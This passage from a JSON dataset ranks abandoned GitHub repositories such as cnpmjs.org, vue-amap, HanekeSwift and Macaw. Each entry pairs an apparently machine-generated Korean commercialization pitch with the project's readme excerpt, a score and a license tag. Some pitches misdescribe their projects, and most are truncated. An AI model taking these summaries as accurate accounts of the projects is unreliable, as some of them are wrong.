수정하거나 개선할 수 있는 기회로, AI 기술을 원하는 기업들에게 큰 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **AI 분석 SaaS**: 기업의 데이터를 분석하여 미래 트렌드를 예측해주는 구독형 서비스\n2. **내부 업무 도구**: 대량의 고객 데이터를","readme_excerpt":"## tensorflow 源码分析\r\n\r\n[[图解tensorflow源码] [原创] Tensorflow 图解分析 （Session, Graph, Kernels, Devices）](http://www.cnblogs.com/yao62995/p/5773578.html)\r\n\r\n## TF Prepare\r\n\r\n[[图解tensorflow源码] 入门准备工作](http://www.cnblogs.com/yao62995/p/5773142.html)\r\n\r\n[[图解tensorflow源码] TF系统概述篇](http://www.cnblogs.com/yao62995/p/5773184.html)\r\n\r\n## Session篇\r\n\r\n[[图解tensorflow源码] Session::Run()流程图 （单机版）](http://www.cnblogs.com/yao62995/p/5773036.html)\r\n\r\n[[图解tensorflow源码] Session::Run() 分布式版本](http://www.cnblogs.com/yao62995/p/5773043.html)\r\n\r\n## Graph 篇\r\n\r\n[[图解tensorflow源码] Graph 图模块 （UML视图）](http://www.cnblogs.com/yao62995/p/5773070.html)\r\n\r\n[[图解tensorflow源码] Graph 图模块 —— Graph Loading](http://www.cnblogs.com/yao62995/p/5773080.html)\r\n\r\n[[图解tensorflow源码] Graph 图构建 （Graph Constructor）](http://www.cnblogs.com/yao62995/p/5773088.html)\r\n\r\n[[图解tensorflow源码] Graph 图优化 （graph optimizer）](http://www.cnblogs.com/yao62995/p/5773103.html)\r\n\r\n## Device 篇\r\n\r\n[[图解tensorflow源码] Simple Placer节点布放算法](http://www.cnblogs.com/yao629","composite_score":0.3238,"license_safety_tag":"unknown"},{"name":"cnpm/cnpmjs.org","github_url":"https://github.com/cnpm/cnpmjs.org","stars":6,"language":"JavaScript","license":"NOASSERTION","abandonment_months":24,"description":"# cnpmjs.org 상업화 분석\n\n## 왜 보물인가\n중국의 npm(소프트웨어 부품 저장소)을 빠르게 제공하는 시스템으로, 중국 개발자들의 작업 속도를 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 SaaS**: 중국 지역 소프트웨어 개발사들을 위한 가속화된 부품 관리 서비스\n2. **내부 도구**: 대형 IT회사의 중국 개발팀이 자체 시","readme_excerpt":"# ‼️ ‼️ ‼️ ‼️ DEPRECATED, please use https://github.com/cnpm/cnpmcore instead ‼️ ‼️ ‼️ ‼️\n# ‼️ ‼️ ‼️ ‼️ DEPRECATED, please use https://github.com/cnpm/cnpmcore instead ‼️ ‼️ ‼️ ‼️\n# ‼️ ‼️ ‼️ ‼️ DEPRECATED, please use https://github.com/cnpm/cnpmcore instead ‼️ ‼️ ‼️ ‼️\n\n------\n\ncnpmjs.org\n=======\n\n[![npm version][npm-image]][npm-url]\n[![Node.js CI](https://github.com/cnpm/cnpmjs.org/actions/workflows/nodejs.yml/badge.svg)](https://github.com/cnpm/cnpmjs.org/actions/workflows/nodejs.yml)\n[![Test coverage][codecov-image]][codecov-url]\n[![Known Vulnerabilities][snyk-image]][snyk-url]\n[![npm download][download-image]][download-url]\n[![FOSSA Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2Fcnpm%2Fcnpmjs.org.svg?type=shield)](https://app.fossa.com/projects/git%2Bgithub.com%2Fcnpm%2Fcnpmjs.org?ref=badge_shield)\n\n[npm-image]: http://cnpmjs.org/badge/v/cnpmjs.org.svg?style=flat-square\n[npm-url]: http://cnpmjs.org/package/cnpmjs.org\n[codecov-image]: https://codecov.io/gh/cnpm/cnpmjs","composite_score":0.3237,"license_safety_tag":"unknown"},{"name":"matplotlib/AnatomyOfMatplotlib","github_url":"https://github.com/matplotlib/AnatomyOfMatplotlib","stars":5,"language":"Jupyter Notebook","license":"NOASSERTION","abandonment_months":58,"description":"# matplotlib/AnatomyOfMatplotlib 분석\n\n## 왜 보물인가\n복잡한 데이터 시각화 도구를 단계별로 배우고 가르칠 수 있는 교육용 가이드입니다.\n\n## 어디에 쓸 수 있나\n\n1. **데이터 분석 교육 플랫폼**: 온라인 강의 사이트에서 차트·그래프 만드는 법을 배우는 강좌로 제공\n2. **기업 내부 교육 도구**: 마케팅팀이 매출 현황","readme_excerpt":"# Introduction\nThis tutorial is a complete re-imagining of how one should teach users\nthe matplotlib library. Hopefully, this tutorial may serve as inspiration\nfor future restructuring of the matplotlib documentation. Plus, I have some\nideas of how to improve this tutorial.\n\nPlease fork and contribute back improvements! Feel free to use this tutorial\nfor conferences and other opportunities for training.\n\nThe tutorial can be viewed on [nbviewer](http://nbviewer.jupyter.org):\n* [Part 0: Introduction To NumPy](http://nbviewer.jupyter.org/github/matplotlib/AnatomyOfMatplotlib/blob/master/AnatomyOfMatplotlib-Part0-Intro2NumPy.ipynb)\n* [Part 1: Overview of Matplotlib](http://nbviewer.jupyter.org/github/matplotlib/AnatomyOfMatplotlib/blob/master/AnatomyOfMatplotlib-Part1-Figures_Subplots_and_layouts.ipynb)\n* [Part 2: Plotting Methods](http://nbviewer.jupyter.org/github/matplotlib/AnatomyOfMatplotlib/blob/master/AnatomyOfMatplotlib-Part2-Plotting_Methods_Overview.ipynb)\n* [Part 3: How To Speak","composite_score":0.3235,"license_safety_tag":"unknown"},{"name":"ElemeFE/vue-amap","github_url":"https://github.com/ElemeFE/vue-amap","stars":5,"language":"JavaScript","license":"mit","abandonment_months":42,"description":"# vue-amap 상용화 분석\n\n## 왜 보물인가\n지도 기능이 필요한 웹 서비스를 쉽게 만들 수 있도록 돕는 중국 아마(Amap) 지도 연동 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **배달·라이드 앱**: 실시간 위치 추적, 매장 검색, 배송 경로 표시 기능이 필요한 SaaS 서비스\n2. **부동산 플랫폼**: 매물 위치 표시, 주변 시설 검색, 지","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://cdn.rawgit.com/ElemeFE/vue-amap/master/src/docs/assets/images/logo.png\">\n</p>\n\n# vue-amap\n[![Build Status](https://travis-ci.org/ElemeFE/vue-amap.svg?branch=master)](https://travis-ci.org/ElemeFE/vue-amap)\n[![npm package](https://img.shields.io/npm/v/vue-amap.svg)](https://www.npmjs.org/package/vue-amap)\n[![NPM downloads](http://img.shields.io/npm/dm/vue-amap.svg)](https://npmjs.org/package/vue-amap)\n![JS gzip size](http://img.badgesize.io/https://unpkg.com/vue-amap/src/lib/index.js?compression=gzip&label=gzip%20size:%20JS)\n[![license](https://img.shields.io/github/license/elemefe/vue-amap.svg?style=flat-square)](https://github.com/ElemeFE/vue-amap)\n[![GitHub stars](https://img.shields.io/github/stars/elemefe/vue-amap.svg?style=social&label=Star)](https://github.com/ElemeFE/vue-amap)\n\n> vue-amap是一套基于Vue 2.0和高德地图的地图组件。\n\n## 安装\n```\nnpm install -S vue-amap\n```\n\n## 文档\n[https://elemefe.github.io/vue-amap](https://elemefe.github.io/vue-amap)\n\n\n## 快速上手\n\n引","composite_score":0.3235,"license_safety_tag":"safe"},{"name":"crazycodeboy/GitHubPopular","github_url":"https://github.com/crazycodeboy/GitHubPopular","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":83,"description":"# GitHubPopular 저장소 분석\n\n## 왜 보물인가\n깃허브에서 인기 있는 프로젝트들을 자동으로 찾아주는 도구로, 개발자들이 트렌드를 빠르게 캐치할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발자 커뮤니티를 위한 \"주간 인기 프로젝트 추천 서비스\"로 제공\n2. **내부 업무 도구**: IT 회사의 기술 트렌드 모니터링","readme_excerpt":"# GitHub Popular\n\n[![Download](https://img.shields.io/badge/Download-v1.0.3-ff69b4.svg) ](http://www.devio.org/io/GitHubPopular/)\n[ ![PRs Welcome](https://img.shields.io/badge/PRs-Welcome-brightgreen.svg)](https://github.com/crazycodeboy/GitHubPopular/pulls)[ ![GitHubPopular release](https://img.shields.io/github/release/crazycodeboy/GitHubPopular.svg?maxAge=2592000?style=flat-square)](https://github.com/crazycodeboy/GitHubPopular/releases)\n[ ![language English](https://img.shields.io/badge/language-English-feb252.svg)](https://github.com/crazycodeboy/GitHubPopular/blob/master/README.en.md)\n\n这是一个用来查看GitHub最受欢迎与最热项目的App,它基于React Native支持Android和iOS双平台。[#最新版React Native+Redux打造点这里☞#](http://coding.imooc.com/class/304.html)\n\n\n## 目录\n\n* [能够Get到的技术](#能够Get到的技术)\n* [功能与特性](#功能与特性)\n* [下载安装](#下载安装)\n* [预览图](#预览图)\n* [运行调试](#运行调试)\n\n\n## 能够Get到的技术\n\n[![能够Get到的技术](https://raw.githubusercontent.com/crazycodeboy/GitHubPopular/master/resource/React-Native%2BRedux.jpg)](http://coding.imooc.com/class/304.ht","composite_score":0.3234,"license_safety_tag":"unknown"},{"name":"supasate/connected-react-router","github_url":"https://github.com/supasate/connected-react-router","stars":5,"language":"JavaScript","license":"mit","abandonment_months":39,"description":"# connected-react-router 가치 분석\n\n## 왜 보물인가\n웹 애플리케이션의 페이지 이동 기능을 자동으로 관리해주는 편의 도구로, 개발자가 복잡한 작업을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **대시보드형 SaaS**: 사용자가 여러 화면을 오가며 데이터를 확인하는 분석 플랫폼\n2. **전자상거래 플랫폼**: 상품 목록→상세보","readme_excerpt":"> Breaking change in v5.0.0! Please read [How to migrate from v4 to v5/v6](https://github.com/supasate/connected-react-router/blob/master/FAQ.md#how-to-migrate-from-v4-to-v5v6).\n\n> v6.0.0 requires React v16.4.0 and React Redux v6.0 / v7.0.\n\nConnected React Router [![Build Status](https://travis-ci.org/supasate/connected-react-router.svg?branch=master)](https://travis-ci.org/supasate/connected-react-router) [![Open Source Helpers](https://www.codetriage.com/supasate/connected-react-router/badges/users.svg)](https://www.codetriage.com/supasate/connected-react-router)\n======================\nA Redux binding for React Router v4 and v5\n\nMain features\n-------------\n:sparkles: Synchronize router state with redux store through uni-directional flow (i.e. history -> store -> router -> components).\n\n:gift: Supports [React Router v4 and v5](https://github.com/ReactTraining/react-router).\n\n:sunny: Supports functional component hot reloading while preserving state (with [react-hot-reload](https://git","composite_score":0.3234,"license_safety_tag":"safe"},{"name":"Haneke/HanekeSwift","github_url":"https://github.com/Haneke/HanekeSwift","stars":5,"language":"Swift","license":"apache-2.0","abandonment_months":67,"description":"# Haneke/HanekeSwift 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 사진과 영상을 빠르고 효율적으로 저장하고 관리해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **사진 공유 앱 서비스**: 인스타그램 같은 SNS 플랫폼에서 사용자가 올린 사진을 빠르게 처리하고 저장\n2. **전자상거래 내부 도구**: 온라인 쇼핑몰의 상품 이미지","readme_excerpt":"![Haneke](https://raw.githubusercontent.com/Haneke/HanekeSwift/master/Assets/github-header.png)\n\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![SwiftPM compatible](https://img.shields.io/badge/SwiftPM-compatible-brightgreen.svg)](https://github.com/apple/swift-package-manager)\n[![Accio supported](https://img.shields.io/badge/Accio-supported-0A7CF5.svg?style=flat)](https://github.com/JamitLabs/Accio)\n[![Platform](https://cocoapod-badges.herokuapp.com/p/HanekeSwift/badge.png)](http://cocoadocs.org/docsets/HanekeSwift)\n[![Build Status](https://travis-ci.org/Haneke/HanekeSwift.svg?branch=master)](https://travis-ci.org/Haneke/HanekeSwift)\n[![Join the chat at https://gitter.im/Haneke/HanekeSwift](https://badges.gitter.im/Haneke/HanekeSwift.svg)](https://gitter.im/Haneke/HanekeSwift?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\nHaneke is a lightweight *generic* cache for iO","composite_score":0.3234,"license_safety_tag":"safe"},{"name":"yipianfengye/android-adDialog","github_url":"https://github.com/yipianfengye/android-adDialog","stars":5,"language":"Java","license":"unknown","abandonment_months":118,"description":"# android-adDialog 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 광고를 깔끔하게 표시해주는 도구로, 앱 개발자들이 광고 수익을 쉽게 올릴 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 개발 플랫폼**: 앱 개발자들이 광고 표시 기능을 쉽게 추가할 수 있는 서비스로 제공\n2. **광고주 대행사**: 스마트폰 앱 내 광","readme_excerpt":"# android-adDialog\n\n**更新日志**\n\n- compile 1.0 2016/08/08 完成广告活动弹窗1.0版本\n\n- compile 1.0 2016/08/08 删除demo中约束引用（否则AS2.2以下编译有问题）\n\n\n\n在介绍具体的使用说明之前，我们先看一下简单的实现效果：\n<br><br>![image](https://github.com/yipianfengye/android-adDialog/blob/master/images/ezgif.com-video-to-gif1.gif)\n\n**使用说明**\n\n- 显示一个默认广告弹窗，支持单广告活动、多广告活动，当弹窗显示多广告是默认显示底部小圆圈，当显示单活动时默认不显示底部小圆圈；\n\n- 默认支持弹窗从上，下，左，右，左上，右上，左下，右下等八个方向弹出，更可以设置从任意指定的角度（0-360）弹出；\n\n- 默认继承了弹性动画效果，可以设定弹性动画弹性参数，动画速度等；\n\n- 支持对弹窗背景透明色的更改，支持对弹窗透明，支持设置弹窗背景全屏显示或者是只在内容区域显示；\n\n- 支持设定弹窗宽高比，支持设置弹窗距离屏幕两侧距离，支持设置关闭按钮是否显示；\n\n- 支持对关闭按钮点击事件的回调，对每一项广告活动点击事件的回调等；\n\n- 支持对ViewPager滑动动画效果的设定，支持自定义ViewPager滑动动画效果；\n\n**API说明：**\n\n所有的设置参数均返回AdManager对象，所以可以直接链式调用。\n```\nAdManager adManager = new AdManager(MainActivity.this, advList);\naDMamager.\n/**\n * 设置弹窗背景全屏显示还是在内容区域显示\n */\n.setOverScreen(true)\n/**\n * 设置ViewPager的滑动动画\n */\n.setPageTransformer(new DepthPageTransformer())\n/**\n * 设置弹窗距离屏幕两侧的距离（单位dp）\n */\n.setPadding(100)\n/**\n * 设置弹窗的宽高比\n */\n.setWidthPerHeight(0.75f)\n/**\n * 设置弹窗的背景色（当弹窗背景设置透明时，此设置失效）\n *","composite_score":0.3232,"license_safety_tag":"unknown"},{"name":"facebook/componentkit","github_url":"https://github.com/facebook/componentkit","stars":5,"language":"Objective-C++","license":"NOASSERTION","abandonment_months":29,"description":"# facebook/componentkit 분석 보고서\n\n## 왜 보물인가\n페이스북(메타)에서 만든 기업용 앱 개발 도구로, 복잡한 화면 구성을 간단하게 만들 수 있게 해주는 실전 검증된 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 관리 화면이나 대시보드를 빠르게 개발하는 웹/앱 빌더 플랫폼\n2. **내부 업무 도구**: 대","readme_excerpt":"# [![ComponentKit](http://componentkit.org/img/componentkit_hero_logo.png)](http://componentkit.org/)\n\n[![Support Ukraine](https://img.shields.io/badge/Support-Ukraine-FFD500?style=flat&labelColor=005BBB)](https://opensource.fb.com/support-ukraine)\n[![Build Status](https://travis-ci.org/facebook/componentkit.svg)](https://travis-ci.org/facebook/componentkit)\n\nComponentKit is a view framework for iOS that is heavily inspired by React. It takes a functional, declarative approach to building UI. It was built to power Facebook's News Feed and is now used throughout the Facebook iOS app.\n\n### Quick start\n\nComponentKit is available to install via [Carthage](https://github.com/Carthage/Carthage). To get started add the following to your [Cartfile](https://github.com/Carthage/Carthage/blob/master/Documentation/Artifacts.md#cartfile):\n\n```\ngithub \"facebook/ComponentKit\" ~> 0.30\n```\n\n### Opening the Xcode projects\nComponentKit has a few dependencies that need to be installed via [Carthage](https","composite_score":0.3232,"license_safety_tag":"unknown"},{"name":"chiphuyen/python-is-cool","github_url":"https://github.com/chiphuyen/python-is-cool","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":78,"description":"# python-is-cool 프로젝트 분석\n\n## 왜 보물인가\nPython이라는 프로그래밍 언어의 유용한 팁과 기법을 모아놓은 교육 자료로, 프로그래머들이 코드를 더 효율적으로 작성하는 법을 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 프로그래밍 입문자를 위한 유료 강좌나 튜토리얼 콘텐츠로 판매\n2. **기업 직원","readme_excerpt":"# python-is-cool\n\nA gentle guide to the Python features that I didn't know existed or was too afraid to use. This will be updated as I learn more and become less lazy.\n\nThis uses `python >= 3.6`.\n\nGitHub has problem rendering Jupyter notebook so I copied the content here. I still keep the notebook in case you want to clone and run it on your machine, but you can also click the Binder badge below and run it in your browser.\n\n[![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/chiphuyen/python-is-cool/master?urlpath=lab/tree/cool-python-tips.ipynb)\n\n## 1. Lambda, map, filter, reduce\nThe lambda keyword is used to create inline functions. The functions`square_fn` and `square_ld` below are identical.\n\n```python\ndef square_fn(x):\n    return x * x\n\nsquare_ld = lambda x: x * x\n\nfor i in range(10):\n    assert square_fn(i) == square_ld(i)\n```\n\nIts quick declaration makes `lambda` functions ideal for use in callbacks, and when functions are to be passed as arguments to oth","composite_score":0.3231,"license_safety_tag":"unknown"},{"name":"squeaky-pl/japronto","github_url":"https://github.com/squeaky-pl/japronto","stars":20,"language":"C","license":"mit","abandonment_months":34,"description":"# Japronto 저장소 분석\n\n## 왜 보물인가\n웹사이트를 빠르게 만들어주는 도구이지만, 최근 3년 이상 업데이트가 없어 현재 웹 기술 표준을 따르지 않아 신뢰성에 문제가 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 회사 내부에서 직원들이 사용하는 간단한 데이터 관리 시스템 구축\n- **소규모 API 판매**: 외부 개발자에게 데이","readme_excerpt":"# Japronto!\n\n[![irc: #japronto](https://img.shields.io/badge/irc-%23japronto-brightgreen.svg)](https://webchat.freenode.net/?channels=japronto)\n[![Gitter japronto/Lobby](https://badges.gitter.im/japronto/Lobby.svg)](https://gitter.im/japronto/Lobby) [![Build Status](https://travis-ci.org/squeaky-pl/japronto.svg?branch=master)](https://travis-ci.org/squeaky-pl/japronto) [![PyPI](https://img.shields.io/pypi/v/japronto.svg)](https://pypi.python.org/pypi/japronto) [![PyPI version](https://img.shields.io/pypi/pyversions/japronto.svg)](https://pypi.python.org/pypi/japronto/)\n\n__There is no new project development happening at the moment, but it's not abandoned either. Pull requests and new maintainers are welcome__.\n\n__If you are a novice Python programmer, you don't like plumbing yourself or you don't have basic understanding of C, this project is not probably what you are looking for__.\n\nJapronto (from Portuguese \"já pronto\" /ˈʒa pɾõtu/ meaning \"already done\") is a __screaming-fast__, __sc","composite_score":0.323,"license_safety_tag":"safe"},{"name":"jup-ag/token-list","github_url":"https://github.com/jup-ag/token-list","stars":287,"language":"TypeScript","license":"NOASSERTION","abandonment_months":13,"description":"","readme_excerpt":"","composite_score":0.3229,"license_safety_tag":"unknown"},{"name":"FrontendMasters/front-end-handbook-2018","github_url":"https://github.com/FrontendMasters/front-end-handbook-2018","stars":7,"language":"HTML","license":"unknown","abandonment_months":34,"description":"# FrontendMasters/front-end-handbook-2018 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 모든 기술과 학습 경로를 정리한 종합 가이드로, 입문자부터 전문가까지 참고할 수 있는 표준 교재입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 웹 개발 입문 과정의 커리큘럼 기초 자료로 판매\n2. **기업 신","readme_excerpt":"# AVAILABLE NOW: [Front-End Developer Handbook 2019](https://frontendmasters.com/guides/front-end-handbook/2019/)\n\n***\n\n## Front-End Developer Handbook 2018\n\n### Written by [Cody Lindley](http://codylindley.com/)\n\n*Sponsored by [Frontend Masters](https://frontendmasters.com/), advancing your skills with in-depth, modern front-end engineering courses*\n\n[![Front End Developer Handbook 2018 Cover](https://frontendmasters.com/guides/front-end-handbook/2018/cover.jpg)](https://frontendmasters.com/guides/front-end-handbook/2018/)\n\nThis is a guide that anyone could use to learn about the practice of front-end development. It broadly outlines and discusses the practice of front-end engineering: how to learn it and what tools are used when practicing it in 2018.\n\nIt is specifically written with the intention of being a professional resource for potential and currently practicing front-end developers to equip themselves with learning materials and development tools. Secondarily, it can be used b","composite_score":0.3228,"license_safety_tag":"unknown"},{"name":"hefuyicoder/ListenerMusicPlayer","github_url":"https://github.com/hefuyicoder/ListenerMusicPlayer","stars":5,"language":"Java","license":"unknown","abandonment_months":111,"description":"# ListenerMusicPlayer 분석\n\n## 왜 보물인가\n스마트폰이나 컴퓨터에서 음악을 편리하게 들을 수 있는 맞춤형 음악 재생 앱으로, 기본적이지만 수요 있는 기능을 갖추고 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **음악 스트리밍 구독 서비스**: 개인 맞춤형 플레이어를 기본 기능으로 제공하여 서비스 차별화\n2. **팟캐스트/오디오북 플랫폼*","readme_excerpt":"# ListenerMusicPlayer\n\n[![license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/hefuyicoder/ListenerMusicPlayer#license)\n[![platform](https://img.shields.io/badge/platform-Android-yellow.svg)](https://www.android.com)\n[![API](https://img.shields.io/badge/API-16%2B-brightgreen.svg?style=flat)](https://android-arsenal.com/api?level=16)\n\n### Introdution\n\n一款优雅的遵循 Material Design 的开源音乐播放器，UI参考 腾讯轻听 音乐播放器,使用 Lastfm Api 与 酷狗歌词Api。项目架构采用 mvp-clean，基于 Retrofit2 + Dagger2 + Rxjava + RxBus + Glide。\n\nA grace open source music player which following the google material design. Using lastfm api and kugou lyric api.App UI base on tencent qingting music player. \n\n### Screenshots\n\n![screenshots](materials/screenshot.png)\n\n### Gif Preview\n\n![gif](materials/2017-02-10%2018_14_47.gif)\n\n### Features\n\n- 遵循 Material Design 规范，界面清新，交互优雅。\n- 基于 MVP-CLEAN + Retrofit2 + Dagger2 + Rxjava + Glide\n- 功能模块： 我的歌曲、我的歌单、文件夹、我喜欢、最近播放、最近添加、播放排行、本地搜索等。\n- 支持显示歌词及缓存\n- 支持耳机线控播放，耳机拔出自动暂停\n- 动态刷新媒体库，及时获知","composite_score":0.3228,"license_safety_tag":"unknown"},{"name":"exyte/Macaw","github_url":"https://github.com/exyte/Macaw","stars":5,"language":"Swift","license":"mit","abandonment_months":28,"description":"# Macaw 저장소 분석\n\n## 왜 보물인가\n애플리케이션의 레이아웃을 자동으로 만들어주는 도구로, 개발자가 디자인 작업에 소비하는 시간을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발 SaaS**: 개발자용 웹 애플리케이션 빌더 서비스로 판매하여 사용자가 코딩 없이 앱을 만들도록 지원\n2. **내부 업무 도구**: 기업의 관리자 대","readme_excerpt":"<a href=\"https://exyte.com/\"><picture><source media=\"(prefers-color-scheme: dark)\" srcset=\"https://raw.githubusercontent.com/exyte/media/master/common/header-dark.png\"><img src=\"https://raw.githubusercontent.com/exyte/media/master/common/header-light.png\"></picture></a>\n\n<a href=\"https://exyte.com/\"><picture><source media=\"(prefers-color-scheme: dark)\" srcset=\"https://raw.githubusercontent.com/exyte/media/master/common/our-site-dark.png\" width=\"80\" height=\"16\"><img src=\"https://raw.githubusercontent.com/exyte/media/master/common/our-site-light.png\" width=\"80\" height=\"16\"></picture></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href=\"https://twitter.com/exyteHQ\"><picture><source media=\"(prefers-color-scheme: dark)\" srcset=\"https://raw.githubusercontent.com/exyte/media/master/common/twitter-dark.png\" width=\"74\" height=\"16\"><img src=\"https://raw.githubusercontent.com/exyte/media/master/common/twitter-light.png\" width=\"74\" height=\"16\">\n</picture></a> <a href=\"https://exyte.com/contacts\"><picture><so","composite_score":0.3228,"license_safety_tag":"safe"},{"name":"ejci/favico.js","github_url":"https://github.com/ejci/favico.js","stars":6,"language":"JavaScript","license":"gpl-2.0","abandonment_months":105,"description":"# favico.js 상용화 분석\n\n## 왜 보물인가\n웹사이트 브라우저 탭에 실시간 알림 배지(숫자, 아이콘)를 표시해주는 기술로, 사용자가 탭을 열어놓지 않아도 중요한 메시지를 즉시 알 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이메일 클라이언트나 메신저 앱이 받은 메시지 개수를 탭에 실시간으로 표시\n2. **내부 업무 도","readme_excerpt":"[![volkswagen status](https://auchenberg.github.io/volkswagen/volkswargen_ci.svg?v=1)](https://github.com/auchenberg/volkswagen)\n# favico.js\nMore info [here](http://lab.ejci.net/favico.js/).\n\n\nAuthor [Miroslav Magda](http://blog.ejci.net)\nVersion 0.3.9\n\nContributors:\n[Serge Barysiuk](https://github.com/sbarysiuk),\n[pissflaps](https://github.com/pissflaps),\n[Yaroslav Yakovlev](https://github.com/yaroslavya),\n[LoicMahieu](https://github.com/LoicMahieu),\n[Renan Gonçalves](https://github.com/renan),\n[Adam Savitzky](https://github.com/adambom),\n[Jory Graham](https://github.com/jory)\n\n```javascript\n\n```\n\n## License\nAll code is open source and dual licensed under GPL and MIT. Check the individual licenses for more information.\n\n### Change log\n#### 0.3.10\n* bugfixes\n\n#### 0.3.9\n* bugfixes\n\n#### 0.3.8\n* bumped version to add it to npm\n\n#### 0.3.7\n* bugfixes & support for font icons (fontawesome)\n\n#### 0.3.6\n* bugfixes\n\n#### 0.3.4\n* new option for position\n\n#### 0.3.3\n* bugfixes\n\n#### 0.3.2\n* su","composite_score":0.3228,"license_safety_tag":"restricted"},{"name":"johnlui/Learn-Laravel-5","github_url":"https://github.com/johnlui/Learn-Laravel-5","stars":9,"language":"PHP","license":"unknown","abandonment_months":35,"description":"# johnlui/Learn-Laravel-5 평가 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 기초 지식을 체계적으로 정리한 교육 자료로, 초보자도 따라하며 배울 수 있는 실용적인 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 부트캠프**: 이 자료를 커리큘럼으로 활용해 학생들에게 웹개발 기초를 가르치는 유료 강의 서비스\n2. *","readme_excerpt":"## Laravel 系列入门教程\n\n如果你想下载我的代码到本地运行，下载完成后记得运行 composer update 命令呦~\n\n### 环境要求\n\n* PHP 7.0.0 以上\n\n### 此为代码示例，教程地址：\n\n> [2017 版 Laravel 系列入门教程（一）【最适合中国人的 Laravel 教程】](https://github.com/johnlui/Learn-Laravel-5/issues/16)\n>\n> [2017 版 Laravel 系列入门教程（二）【最适合中国人的 Laravel 教程】](https://github.com/johnlui/Learn-Laravel-5/issues/17)\n>\n> [2017 版 Laravel 系列入门教程（三）【最适合中国人的 Laravel 教程】](https://github.com/johnlui/Learn-Laravel-5/issues/18)\n>\n> [2017 版 Laravel 系列入门教程（四）【最适合中国人的 Laravel 教程】](https://github.com/johnlui/Learn-Laravel-5/issues/19)\n>\n> [2017 版 Laravel 系列入门教程（五）【最适合中国人的 Laravel 教程】](https://github.com/johnlui/Learn-Laravel-5/issues/20)\n\n***有问题可以直接在教程下面留言***\n\n> ### 喜欢此系列教程可以点击上面右侧的 Star 哦，变成 Unstar 就可以了！ :stuck_out_tongue_winking_eye:\n\n### License\n\n本示例项目继承自 Laravel 采用的 [MIT license](http://opensource.org/licenses/MIT)，你可以利用采用该协议的代码做任何事情，只需要保留源码中的版权声明即可。","composite_score":0.3227,"license_safety_tag":"unknown"},{"name":"malte-wessel/react-custom-scrollbars","github_url":"https://github.com/malte-wessel/react-custom-scrollbars","stars":6,"language":"JavaScript","license":"mit","abandonment_months":27,"description":"# react-custom-scrollbars 분석 보고서\n\n## 왜 보물인가\n웹사이트의 스크롤바를 예쁘게 꾸밀 수 있는 도구로, 사용자 경험을 높이려는 모든 웹 서비스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 분석 대시보드나 프로젝트 관리 툴의 긴 목록을 보기 좋게 표시할 수 있습니다.\n2. **내부 업무 도구**:","readme_excerpt":"react-custom-scrollbars\n=========================\n\n[![npm](https://img.shields.io/badge/npm-react--custom--scrollbars-brightgreen.svg?style=flat-square)]()\n[![npm version](https://img.shields.io/npm/v/react-custom-scrollbars.svg?style=flat-square)](https://www.npmjs.com/package/react-custom-scrollbars)\n[![npm downloads](https://img.shields.io/npm/dm/react-custom-scrollbars.svg?style=flat-square)](https://www.npmjs.com/package/react-custom-scrollbars)\n\n* frictionless native browser scrolling\n* native scrollbars for mobile devices\n* [fully customizable](https://github.com/malte-wessel/react-custom-scrollbars/blob/master/docs/customization.md)\n* [auto hide](https://github.com/malte-wessel/react-custom-scrollbars/blob/master/docs/usage.md#auto-hide)\n* [auto height](https://github.com/malte-wessel/react-custom-scrollbars/blob/master/docs/usage.md#auto-height)\n* [universal](https://github.com/malte-wessel/react-custom-scrollbars/blob/master/docs/usage.md#universal-rendering) (runs on client ","composite_score":0.3227,"license_safety_tag":"safe"},{"name":"mhagiwara/100-nlp-papers","github_url":"https://github.com/mhagiwara/100-nlp-papers","stars":8,"language":"","license":"unknown","abandonment_months":59,"description":"# 100-nlp-papers 저장소 분석\n\n## 왜 보물인가\n자연어 처리 분야의 핵심 논문 100개를 체계적으로 정리한 학습 자료로, AI 기술의 역사와 원리를 빠르게 습득할 수 있는 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: AI 교육 플랫폼에서 구조화된 커리큘럼으로 제공하는 유료 학습 과정\n- **내부 업무 도구**: ","readme_excerpt":"# 100 Must-Read NLP Papers\n\nThis is a list of 100 important natural language processing (NLP) papers that serious students and researchers working in the field should probably know about and read. This list is compiled by [Masato Hagiwara](http://masatohagiwara.net/). I welcome any feedback on this list.\n\nThis list is originally based on the answers for a Quora question I posted years ago: [What are the most important research papers which all NLP students should definitely read?](https://www.quora.com/What-are-the-most-important-research-papers-which-all-NLP-students-should-definitely-read). I thank all the people who contributed to the original post.\n\nThis list is far from complete or objective, and is evolving, as important papers are being published year after year. Please let me know via 